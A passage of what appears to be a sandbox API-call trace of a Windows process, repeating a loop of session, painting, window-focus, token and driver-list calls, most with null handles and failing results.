WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.843] WTSFreeMemory (pMemory=0x0) [0220.843] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.843] TextOutW (hdc=0x0, x=414, y=799, lpString="", c=0) returned 1 [0220.843] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.843] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.843] GetTickCount () returned 0xe251 [0220.844] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.844] SetForegroundWindow (hWnd=0x0) returned 0 [0220.844] BringWindowToTop (hWnd=0x0) returned 0 [0220.844] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2d0) returned 1 [0220.844] GetTokenInformation (in: TokenHandle=0x2d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.844] GetLastError () returned 0x7a [0220.844] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.844] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.845] WTSFreeMemory (pMemory=0x0) [0220.845] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.845] TextOutW (hdc=0x0, x=424, y=824, lpString="", c=0) returned 1 [0220.845] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.845] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.845] GetTickCount () returned 0xe251 [0220.845] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.845] SetForegroundWindow (hWnd=0x0) returned 0 [0220.845] BringWindowToTop (hWnd=0x0) returned 0 [0220.845] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2d4) returned 1 [0220.845] GetTokenInformation (in: TokenHandle=0x2d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.845] GetLastError () returned 0x7a [0220.845] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.846] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.846] WTSFreeMemory (pMemory=0x0) [0220.846] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.846] TextOutW (hdc=0x0, x=434, y=849, lpString="", c=0) returned 1 [0220.846] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.846] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.846] GetTickCount () returned 0xe251 [0220.852] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.852] SetForegroundWindow (hWnd=0x0) returned 0 [0220.852] BringWindowToTop (hWnd=0x0) returned 0 [0220.852] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2d8) returned 1 [0220.852] GetTokenInformation (in: TokenHandle=0x2d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.852] GetLastError () returned 0x7a [0220.852] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.852] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.853] WTSFreeMemory (pMemory=0x0) [0220.853] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.853] TextOutW (hdc=0x0, x=444, y=874, lpString="", c=0) returned 1 [0220.853] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.853] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.853] GetTickCount () returned 0xe261 [0220.853] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.853] SetForegroundWindow (hWnd=0x0) returned 0 [0220.853] BringWindowToTop (hWnd=0x0) returned 0 [0220.853] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2dc) returned 1 [0220.853] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.853] GetLastError () returned 0x7a [0220.853] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.853] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.854] WTSFreeMemory (pMemory=0x0) [0220.854] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.854] TextOutW (hdc=0x0, x=454, y=899, lpString="", c=0) returned 1 [0220.854] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.854] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.854] GetTickCount () returned 0xe261 [0220.869] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.869] SetForegroundWindow (hWnd=0x0) returned 0 [0220.869] BringWindowToTop (hWnd=0x0) returned 0 [0220.870] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2e0) returned 1 [0220.870] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.870] GetLastError () returned 0x7a [0220.870] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.870] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.870] WTSFreeMemory (pMemory=0x0) [0220.870] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.870] TextOutW (hdc=0x0, x=464, y=924, lpString="", c=0) returned 1 [0220.870] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.870] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.870] GetTickCount () returned 0xe270 [0220.871] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.871] SetForegroundWindow (hWnd=0x0) returned 0 [0220.871] BringWindowToTop (hWnd=0x0) returned 0 [0220.871] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2e4) returned 1 [0220.871] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.871] GetLastError () returned 0x7a [0220.871] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.872] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.872] WTSFreeMemory (pMemory=0x0) [0220.872] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.872] TextOutW (hdc=0x0, x=474, y=949, lpString="", c=0) returned 1 [0220.872] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.872] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.872] GetTickCount () returned 0xe270 [0220.873] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.873] SetForegroundWindow (hWnd=0x0) returned 0 [0220.873] BringWindowToTop (hWnd=0x0) returned 0 [0220.873] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2e8) returned 1 [0220.873] GetTokenInformation (in: TokenHandle=0x2e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.873] GetLastError () returned 0x7a [0220.873] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.873] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.874] WTSFreeMemory (pMemory=0x0) [0220.874] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.874] TextOutW (hdc=0x0, x=484, y=974, lpString="", c=0) returned 1 [0220.874] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.874] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.874] GetTickCount () returned 0xe270 [0220.875] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.875] SetForegroundWindow (hWnd=0x0) returned 0 [0220.875] BringWindowToTop (hWnd=0x0) returned 0 [0220.875] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2ec) returned 1 [0220.875] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.875] GetLastError () returned 0x7a [0220.875] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.875] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.876] WTSFreeMemory (pMemory=0x0) [0220.876] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.876] TextOutW (hdc=0x0, x=494, y=999, lpString="", c=0) returned 1 [0220.876] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.876] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.876] GetTickCount () returned 0xe270 [0220.876] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.876] SetForegroundWindow (hWnd=0x0) returned 0 [0220.876] BringWindowToTop (hWnd=0x0) returned 0 [0220.876] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2f0) returned 1 [0220.876] GetTokenInformation (in: TokenHandle=0x2f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.876] GetLastError () returned 0x7a [0220.876] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.876] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.877] WTSFreeMemory (pMemory=0x0) [0220.877] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.877] TextOutW (hdc=0x0, x=504, y=1024, lpString="", c=0) returned 1 [0220.877] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.877] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.877] GetTickCount () returned 0xe270 [0220.881] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.881] SetForegroundWindow (hWnd=0x0) returned 0 [0220.881] BringWindowToTop (hWnd=0x0) returned 0 [0220.881] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2f4) returned 1 [0220.881] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.881] GetLastError () returned 0x7a [0220.881] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.881] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.882] WTSFreeMemory (pMemory=0x0) [0220.882] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.882] TextOutW (hdc=0x0, x=514, y=1049, lpString="", c=0) returned 1 [0220.882] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.882] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.882] GetTickCount () returned 0xe280 [0220.883] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.883] SetForegroundWindow (hWnd=0x0) returned 0 [0220.883] BringWindowToTop (hWnd=0x0) returned 0 [0220.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2f8) returned 1 [0220.883] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.883] GetLastError () returned 0x7a [0220.883] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.883] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.884] WTSFreeMemory (pMemory=0x0) [0220.884] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.884] TextOutW (hdc=0x0, x=524, y=1074, lpString="", c=0) returned 1 [0220.884] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.884] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.884] GetTickCount () returned 0xe280 [0220.888] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.888] SetForegroundWindow (hWnd=0x0) returned 0 [0220.888] BringWindowToTop (hWnd=0x0) returned 0 [0220.888] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2fc) returned 1 [0220.889] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.889] GetLastError () returned 0x7a [0220.889] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.889] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.889] WTSFreeMemory (pMemory=0x0) [0220.889] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.889] TextOutW (hdc=0x0, x=534, y=1099, lpString="", c=0) returned 1 [0220.889] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.890] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.890] GetTickCount () returned 0xe280 [0220.890] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.890] SetForegroundWindow (hWnd=0x0) returned 0 [0220.890] BringWindowToTop (hWnd=0x0) returned 0 [0220.890] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x300) returned 1 [0220.890] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.890] GetLastError () returned 0x7a [0220.890] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.890] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.891] WTSFreeMemory (pMemory=0x0) [0220.891] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.891] TextOutW (hdc=0x0, x=544, y=1124, lpString="", c=0) returned 1 [0220.891] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.891] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.891] GetTickCount () returned 0xe280 [0220.892] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.892] SetForegroundWindow (hWnd=0x0) returned 0 [0220.892] BringWindowToTop (hWnd=0x0) returned 0 [0220.892] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x304) returned 1 [0220.892] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.892] GetLastError () returned 0x7a [0220.892] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.892] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.893] WTSFreeMemory (pMemory=0x0) [0220.893] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.893] TextOutW (hdc=0x0, x=554, y=1149, lpString="", c=0) returned 1 [0220.893] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.893] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.893] GetTickCount () returned 0xe280 [0220.894] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.894] SetForegroundWindow (hWnd=0x0) returned 0 [0220.894] BringWindowToTop (hWnd=0x0) returned 0 [0220.894] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x308) returned 1 [0220.894] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.894] GetLastError () returned 0x7a [0220.894] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.894] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.895] WTSFreeMemory (pMemory=0x0) [0220.895] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.895] TextOutW (hdc=0x0, x=564, y=1174, lpString="", c=0) returned 1 [0220.895] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.895] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.895] GetTickCount () returned 0xe280 [0220.895] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.899] SetForegroundWindow (hWnd=0x0) returned 0 [0220.899] BringWindowToTop (hWnd=0x0) returned 0 [0220.899] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x30c) returned 1 [0220.900] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.900] GetLastError () returned 0x7a [0220.900] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.900] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.900] WTSFreeMemory (pMemory=0x0) [0220.900] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.900] TextOutW (hdc=0x0, x=574, y=1199, lpString="", c=0) returned 1 [0220.901] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.901] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.901] GetTickCount () returned 0xe290 [0220.901] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.901] SetForegroundWindow (hWnd=0x0) returned 0 [0220.901] BringWindowToTop (hWnd=0x0) returned 0 [0220.901] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x310) returned 1 [0220.901] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.901] GetLastError () returned 0x7a [0220.901] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.901] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.902] WTSFreeMemory (pMemory=0x0) [0220.902] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.902] TextOutW (hdc=0x0, x=584, y=1224, lpString="", c=0) returned 1 [0220.902] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.902] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.902] GetTickCount () returned 0xe290 [0220.903] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.903] SetForegroundWindow (hWnd=0x0) returned 0 [0220.903] BringWindowToTop (hWnd=0x0) returned 0 [0220.903] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x314) returned 1 [0220.903] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.903] GetLastError () returned 0x7a [0220.903] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.903] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.904] WTSFreeMemory (pMemory=0x0) [0220.904] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.904] TextOutW (hdc=0x0, x=594, y=1249, lpString="", c=0) returned 1 [0220.904] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.904] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.904] GetTickCount () returned 0xe290 [0220.905] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.905] SetForegroundWindow (hWnd=0x0) returned 0 [0220.905] BringWindowToTop (hWnd=0x0) returned 0 [0220.905] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x318) returned 1 [0220.905] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.905] GetLastError () returned 0x7a [0220.905] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.905] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.906] WTSFreeMemory (pMemory=0x0) [0220.906] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.906] TextOutW (hdc=0x0, x=604, y=1274, lpString="", c=0) returned 1 [0220.906] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.906] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.906] GetTickCount () returned 0xe290 [0220.906] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.906] SetForegroundWindow (hWnd=0x0) returned 0 [0220.907] BringWindowToTop (hWnd=0x0) returned 0 [0220.907] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x31c) returned 1 [0220.907] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.907] GetLastError () returned 0x7a [0220.907] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.907] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.907] WTSFreeMemory (pMemory=0x0) [0220.907] BeginPaint (in: 